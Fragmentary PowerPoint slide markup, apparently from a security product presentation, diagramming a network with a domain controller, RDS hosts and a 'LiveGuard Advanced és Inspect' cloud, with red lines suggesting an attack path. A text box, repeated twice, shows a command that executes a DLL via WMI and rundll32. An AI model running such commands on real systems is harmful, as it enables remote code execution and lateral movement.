              <a:ext cx="1459963" cy="196648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462519E-A5DA-8100-8308-E15A207F1171}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4596105" y="6039350"/>
              <a:ext cx="1982799" cy="830997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  <a:t>Domain</a:t>
              </a:r>
              <a:b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</a:br>
              <a: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  <a:t>Controller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CF8BB175-7EE2-127E-B2CD-E1C96E294D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267200" y="266700"/>
            <a:ext cx="9753600" cy="97536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F27366EC-205D-61D1-A4E7-00DC37A8A0C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6067249" y="4223963"/>
            <a:ext cx="1459963" cy="2338580"/>
            <a:chOff x="6067249" y="4223963"/>
            <a:chExt cx="1459963" cy="233858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F08C992-6F94-D49B-F9D6-1B5877C00889}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6067249" y="4223963"/>
              <a:ext cx="1459963" cy="2338580"/>
              <a:chOff x="4857524" y="4160260"/>
              <a:chExt cx="1459963" cy="2338580"/>
            </a:xfrm>
          </p:grpSpPr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F79AB280-3999-86E2-1C42-9ECED7502C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857524" y="4160260"/>
                <a:ext cx="1459963" cy="1966480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840CCDF-833C-DFC0-423E-FBB25B9748FE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4957545" y="6037175"/>
                <a:ext cx="1259919" cy="461665"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom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424D56"/>
                    </a:solidFill>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>RDS</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grp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2880CCF6-10EF-0E05-7F04-858D42AA8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607916" y="5553702"/>
              <a:ext cx="464482" cy="566940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FE7E22F7-E947-9953-EEB1-756761EA5D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987994" y="7385041"/>
            <a:ext cx="1459963" cy="1966481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EF96BCFD-0811-E921-8900-A15965FA86B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6440972" y="7385042"/>
            <a:ext cx="1459963" cy="1966481"/>
            <a:chOff x="6440972" y="7385042"/>
            <a:chExt cx="1459963" cy="1966481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E45E613D-2D45-934F-2C8A-338ADCC872D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440972" y="7385042"/>
              <a:ext cx="1459963" cy="1966481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31556A2F-8E9E-A559-95A3-E037462D6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999429" y="8084811"/>
              <a:ext cx="464482" cy="5669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D9CCE8B-B893-E693-30AA-E6175D4FE448}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8214483" y="7385041"/>
            <a:ext cx="1459963" cy="1966481"/>
            <a:chOff x="8214483" y="7385041"/>
            <a:chExt cx="1459963" cy="1966481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F5ACFE61-161D-8260-064F-1AD7E670148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8214483" y="7385041"/>
              <a:ext cx="1459963" cy="1966481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BE988E64-64D8-7FEE-5251-D56CD0884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8760513" y="8084811"/>
              <a:ext cx="464482" cy="5669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E9A73EA-0D18-B4CF-B137-C83E6AB07191}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11858362" y="7205476"/>
            <a:ext cx="1652602" cy="1101734"/>
            <a:chOff x="11858362" y="7205476"/>
            <a:chExt cx="1652602" cy="110173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F31E8E86-E6AD-463E-0F0E-8F66DEFC2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11858362" y="7205476"/>
              <a:ext cx="1652602" cy="1101734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8AF7769B-E4B8-6974-4189-2D0D640E7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2446684" y="7472873"/>
              <a:ext cx="464482" cy="5669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E989B14-0BD9-5F77-4BD8-40E4005774B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13583252" y="6562543"/>
            <a:ext cx="1652602" cy="1101734"/>
            <a:chOff x="13583252" y="6562543"/>
            <a:chExt cx="1652602" cy="1101734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67CE77A3-605D-B007-0B70-9C770D303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13583252" y="6562543"/>
              <a:ext cx="1652602" cy="1101734"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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74FD1ADE-9FBD-2826-B095-9C3C12C868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4177312" y="6829940"/>
              <a:ext cx="464482" cy="5669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6CE2947-E88E-81D1-EBD4-BE85D0CA4847}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15055789" y="4694334"/>
            <a:ext cx="1729827" cy="1585675"/>
            <a:chOff x="15055789" y="4694334"/>
            <a:chExt cx="1729827" cy="1585675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0958E57E-B055-6B62-832A-FF9C3FB9A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5055789" y="4694334"/>
              <a:ext cx="1729827" cy="1585675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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1C954836-6C14-164A-D70F-78988B37C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5533037" y="5407540"/>
              <a:ext cx="464482" cy="56694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1B61AE7-D959-6D29-5176-6922FFBB2874}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15421521" y="2099717"/>
            <a:ext cx="1729827" cy="1585675"/>
            <a:chOff x="15421521" y="2099717"/>
            <a:chExt cx="1729827" cy="1585675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A17064CA-0FCF-70A6-9DDE-A9781301FE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5421521" y="2099717"/>
              <a:ext cx="1729827" cy="1585675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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D43D9EB2-1788-6BDD-6FF2-EE81D3FAD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5896053" y="2823564"/>
              <a:ext cx="464482" cy="566940"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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51E564F-0AC4-03C7-50CA-F7E85AC78A76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6848475" y="2676525"/>
            <a:ext cx="2576513" cy="2508250"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="40894">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:prstDash val="dashDot"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="4318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EC92906-74F3-97F1-3B09-6559DA9CEF66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13286213" y="3199706"/>
            <a:ext cx="1729827" cy="1585675"/>
            <a:chOff x="13286213" y="3199706"/>
            <a:chExt cx="1729827" cy="1585675"/>
          </a:xfrm>
        </p:grpSpPr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9C252C43-0AD0-20B8-C1BF-A4461B284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3286213" y="3199706"/>
              <a:ext cx="1729827" cy="1585675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90658881-E06F-ACD0-9812-9A561BE2A7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3778328" y="3922114"/>
              <a:ext cx="464482" cy="566940"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grp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79ED2560-D41D-F01B-E10B-69205EFA2C2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2016600" y="1149179"/>
            <a:ext cx="14833600" cy="636529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88900">
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="75000"/>
                <a:lumOff val="25000"/>
                <a:alpha val="66000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:glow rad="584200">
              <a:schemeClr val="tx2">
                <a:alpha val="73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glow rad="190500">
                    <a:schemeClr val="tx2">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:glow>
                </a:effectLst>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WMI:&gt; %WINDIR%\syswow64\rundll32.exe c:\windows\COMPANY_c.dll,VisibleEntry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53C982C0-982E-809C-EA31-13528121596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429227" y="5336491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0F92E195-A3D2-639B-B963-9D542EF8D3F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815646" y="7896095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9937AFE1-8F2B-D174-59CF-5DBDFB7075B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574453" y="7913158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670C4BDB-0EDC-36D2-08C7-B07D6C4FEFA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0304059" y="7896096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B6288C0F-B077-20AF-437F-3CCF5FD9DA1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2260624" y="7266323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B7115D1B-9545-8E18-DFE6-191DA4D4286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3989703" y="6623390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7539D67B-6DE4-1B96-6C84-E1828CFA63A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5340870" y="5265354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ADCCAD6E-B11A-613E-790F-E72C869B8EB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3606570" y="3770225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0001944E-3B07-0F46-C0A6-C8A31D4B449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5695229" y="2675036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EA1A155-892C-EE66-216E-95809CEE4A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9059154" y="2317462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2C036F94-8218-B76A-417A-9188E84F24E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8628233" y="5028108"/>
            <a:ext cx="1266949" cy="963595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  <a:softEdge rad="0"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63" name="Graphic 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FDEFD48-0E1D-B9C1-259D-EA7C8D00CDA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379874" y="7459200"/>
            <a:ext cx="2430121" cy="1886916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CD3ECAC-7A3B-8D57-A55B-6D447F805D24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2809995" y="5206520"/>
            <a:ext cx="4003767" cy="3196138"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="40894">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:prstDash val="dashDot"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="4318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loud 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DD17402-BA52-B3B3-295F-A35E99AD8DA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-31587" y="893179"/>
            <a:ext cx="5938658" cy="3944499"/>
          </a:xfrm>
          <a:prstGeom prst="cloud">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:shade val="15000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003C41"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="127000">
                    <a:schemeClr val="accent1">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                      <a:alpha val="90000"/>
                    </a:schemeClr>
                  </a:glow>
                </a:effectLst>
              </a:rPr>
              <a:t>LiveGuard Advanced </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003C41"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="127000">
                    <a:schemeClr val="accent1">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                      <a:alpha val="90000"/>
                    </a:schemeClr>
                  </a:glow>
                </a:effectLst>
              </a:rPr>
              <a:t>és </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003C41"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="127000">
                    <a:schemeClr val="accent1">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                      <a:alpha val="90000"/>
                    </a:schemeClr>
                  </a:glow>
                </a:effectLst>
              </a:rPr>
              <a:t>Inspect</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003C41"/>
              </a:solidFill>
              <a:effectLst>
                <a:glow rad="127000">
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                    <a:alpha val="90000"/>
                  </a:schemeClr>
                </a:glow>
              </a:effectLst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36763C8-47CF-7820-1335-874AD9BC8811}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="626899" y="1597348"/>
            <a:ext cx="1123002" cy="980752"/>
            <a:chOff x="1791972" y="1887566"/>
            <a:chExt cx="1749469" cy="1556524"/>
          </a:xfrm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24FACD1-99B0-F4BE-6851-7CAED3062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p:blipFill>
          <p:spPr>
            <a:xfrm rot="15438576">
              <a:off x="1801945" y="1877593"/>
              <a:ext cx="1017278" cy="1037224"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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6EB2E424-EF87-D620-CB45-404A492C8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p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2510382" y="2185592"/>
              <a:ext cx="1031059" cy="1258498"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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5A6479CE-2BE3-48D2-AD45-281AA516F09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4505217" y="1473682"/>
            <a:ext cx="1055263" cy="1064643"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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6392260" y="0"/>
            <a:ext cx="189574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8367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C9983-F191-DD8A-9C53-D9DF3EAA4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25A2E56-1BDD-3D55-D1DC-479358FA635C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5702299" y="1461299"/>
            <a:ext cx="12118307" cy="827646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78BD718-FDB7-CEA8-A6D3-370FC99C1548}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8435715" y="1697956"/>
            <a:ext cx="1982799" cy="2710087"/>
            <a:chOff x="4596105" y="4160260"/>
            <a:chExt cx="1982799" cy="2710087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C3B05FDB-2A13-9998-8062-5655EBFF19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4857524" y="4160260"/>
              <a:ext cx="1459963" cy="196648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BA8B19F-3214-CD7F-4C3C-EC1223568B85}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4596105" y="6039350"/>
              <a:ext cx="1982799" cy="830997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  <a:t>Domain</a:t>
              </a:r>
              <a:b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</a:br>
              <a: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  <a:t>Controller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5ECB5C88-8EFE-8A8B-8439-5A4F4D88EE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267200" y="266700"/>
            <a:ext cx="9753600" cy="97536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1CAB04F9-C50B-0598-6BB3-5C42A16DDEE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6067249" y="4223963"/>
            <a:ext cx="1459963" cy="2338580"/>
            <a:chOff x="6067249" y="4223963"/>
            <a:chExt cx="1459963" cy="233858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882A7F6-2C96-410D-0904-B55E85129695}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6067249" y="4223963"/>
              <a:ext cx="1459963" cy="2338580"/>
              <a:chOff x="4857524" y="4160260"/>
              <a:chExt cx="1459963" cy="2338580"/>
            </a:xfrm>
          </p:grpSpPr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DFDA9E71-EFC2-C417-E6A8-64622793BC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857524" y="4160260"/>
                <a:ext cx="1459963" cy="1966480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B0DA30C-F5C5-3C82-5653-BE1607AF27E5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4957545" y="6037175"/>
                <a:ext cx="1259919" cy="461665"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom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424D56"/>
                    </a:solidFill>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>RDS</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grp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07748EE9-3F7A-1EAF-B2CB-3CAE169EA6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607916" y="5553702"/>
              <a:ext cx="464482" cy="566940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879C0083-D97F-6E83-0192-B8417805C4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987994" y="7385041"/>
            <a:ext cx="1459963" cy="1966481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AE30498D-1451-616F-9D98-091527A76DDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6440972" y="7385042"/>
            <a:ext cx="1459963" cy="1966481"/>
            <a:chOff x="6440972" y="7385042"/>
            <a:chExt cx="1459963" cy="1966481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5B28CA68-C3E0-E641-68A3-7692A1DA1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440972" y="7385042"/>
              <a:ext cx="1459963" cy="1966481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D03C929C-8A44-F7F0-2AB0-E3A35B30B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999429" y="8084811"/>
              <a:ext cx="464482" cy="5669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55E9EE9-52F5-BB60-7F8A-FDCE6E1C1EC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8214483" y="7385041"/>
            <a:ext cx="1459963" cy="1966481"/>
            <a:chOff x="8214483" y="7385041"/>
            <a:chExt cx="1459963" cy="1966481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3F764B11-0004-FDF1-724A-E31977E7E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8214483" y="7385041"/>
              <a:ext cx="1459963" cy="1966481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38052F75-9E0E-257C-7DDC-B4CC44C43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8760513" y="8084811"/>
              <a:ext cx="464482" cy="5669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D9A14A7-F22A-85F5-5A53-67B962C316EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11858362" y="7205476"/>
            <a:ext cx="1652602" cy="1101734"/>
            <a:chOff x="11858362" y="7205476"/>
            <a:chExt cx="1652602" cy="110173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762375CB-B4BB-51B7-DB9D-2090F8628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11858362" y="7205476"/>
              <a:ext cx="1652602" cy="1101734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D84D2C52-1E77-CE4B-5458-003E8CE5D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2446684" y="7472873"/>
              <a:ext cx="464482" cy="5669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66AA432-674C-1996-5174-E1D4104A13B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13583252" y="6562543"/>
            <a:ext cx="1652602" cy="1101734"/>
            <a:chOff x="13583252" y="6562543"/>
            <a:chExt cx="1652602" cy="1101734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E3D1D341-FB48-0E28-FB6E-667853A0C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13583252" y="6562543"/>
              <a:ext cx="1652602" cy="1101734"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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067CD267-2900-2621-AA30-EACD9DAE3D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4177312" y="6829940"/>
              <a:ext cx="464482" cy="5669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FE6EAFE-9CD3-24C6-7A39-A9D09E0277ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15055789" y="4694334"/>
            <a:ext cx="1729827" cy="1585675"/>
            <a:chOff x="15055789" y="4694334"/>
            <a:chExt cx="1729827" cy="1585675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0DFBC41A-5112-2D89-F3F2-C4FF82B22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5055789" y="4694334"/>
              <a:ext cx="1729827" cy="1585675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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BE87851D-2A18-1471-B551-BBC64041C9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5533037" y="5407540"/>
              <a:ext cx="464482" cy="56694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2053DF7-BF88-E8BE-49C4-E7BF25F3D7F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15421521" y="2099717"/>
            <a:ext cx="1729827" cy="1585675"/>
            <a:chOff x="15421521" y="2099717"/>
            <a:chExt cx="1729827" cy="1585675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A25BC5A8-5BB4-1EAA-5259-A5B9B4391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5421521" y="2099717"/>
              <a:ext cx="1729827" cy="1585675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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839F9756-E26A-CDFF-CBFA-41A362720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5896053" y="2823564"/>
              <a:ext cx="464482" cy="566940"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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8E7F065-262D-4720-2352-473A36CC8F42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6848475" y="2676525"/>
            <a:ext cx="2576513" cy="2508250"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="40894">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:prstDash val="dashDot"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="4318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84AC023-B99E-6AA8-095D-124CB17AEE38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13286213" y="3199706"/>
            <a:ext cx="1729827" cy="1585675"/>
            <a:chOff x="13286213" y="3199706"/>
            <a:chExt cx="1729827" cy="1585675"/>
          </a:xfrm>
        </p:grpSpPr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7DAEA163-7321-9DE4-98C7-3721BC5B5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3286213" y="3199706"/>
              <a:ext cx="1729827" cy="1585675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570036D9-8474-70DD-FD39-6542286429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3778328" y="3922114"/>
              <a:ext cx="464482" cy="566940"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grp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33E369C2-3739-3CE6-E66E-45D6FE0773E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2016600" y="1149179"/>
            <a:ext cx="14833600" cy="636529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88900">
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="75000"/>
                <a:lumOff val="25000"/>
                <a:alpha val="66000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:glow rad="584200">
              <a:schemeClr val="tx2">
                <a:alpha val="73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glow rad="190500">
                    <a:schemeClr val="tx2">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:glow>
                </a:effectLst>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WMI:&gt; %WINDIR%\syswow64\rundll32.exe c:\windows\COMPANY_c.dll,VisibleEntry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8EBF717-0474-F11A-6AB5-FE34D37D36B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429227" y="5336491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F90EAB-5DF0-A864-DB2F-D8CC72C829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815646" y="7896095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9ACA9923-9005-A977-2BF2-B1426079E5A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574453" y="7913158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382398D0-9EC8-EA5F-A6BB-07E5A2C2F4A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0304059" y="7896096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3F78924F-1DBD-8137-7A36-2B572F3A300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2260624" y="7266323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57F5F0F4-B5ED-762D-1418-6086800328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3989703" y="6623390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D03C92E6-A668-E977-7B6D-A9B8FFCB806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5340870" y="5265354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ABD8C060-C981-0894-BEC6-5B1684637CB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3606570" y="3770225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634F94C2-55B3-8EEF-4659-0A53C603EC7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5695229" y="2675036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D370BE0-8473-53EF-659A-A0268535A40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9059154" y="2317462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40C1C487-7C6C-D2C6-00D3-8C75F3CF387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8628233" y="5028108"/>
            <a:ext cx="1266949" cy="963595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  <a:softEdge rad="0"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63" name="Graphic 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CF662F0-DAC3-4406-EC0C-CD969E6AA1E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379874" y="7459200"/>
            <a:ext cx="2430121" cy="1886916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DEF3910-684C-0DE4-FEE6-928B2535E179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2809995" y="5206520"/>
            <a:ext cx="4003767" cy="3196138"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="40894">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:prstDash val="dashDot"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="4318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loud 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5E34BCF-FC0D-B2DB-B1FF-F0C4CC0A7A37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-31587" y="893179"/>
            <a:ext cx="5938658" cy="3944499"/>
          </a:xfrm>
          <a:prstGeom prst="cloud">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:shade val="15000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003C41"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="127000">
                    <a:schemeClr val="accent1">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                      <a:alpha val="90000"/>
                    </a:schemeClr>
                  </a:glow>
                </a:effectLst>
              </a:rPr>
              <a:t>LiveGuard Advanced </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003C41"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="127000">
                    <a:schemeClr val="accent1">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                      <a:alpha val="90000"/>
                    </a:schemeClr>
                  </a:glow>
                </a:effectLst>
              </a:rPr>
              <a:t>és</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003C41"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="127000">
                    <a:schemeClr val="accent1">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                      <a:alpha val="90000"/>
                    </a:schemeClr>
                  </a:glow>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003C41"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="127000">
                    <a:schemeClr val="accent1">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                      <a:alpha val="90000"/>
                    </a:schemeClr>
                  </a:glow>
                </a:effectLst>
              </a:rPr>
              <a:t>Inspect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428EDEE-57FB-40A1-188A-940E828CD23B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="626899" y="1597348"/>
            <a:ext cx="1123002" cy="980752"/>
            <a:chOff x="1791972" y="1887566"/>
            <a:chExt cx="1749469" cy="1556524"/>
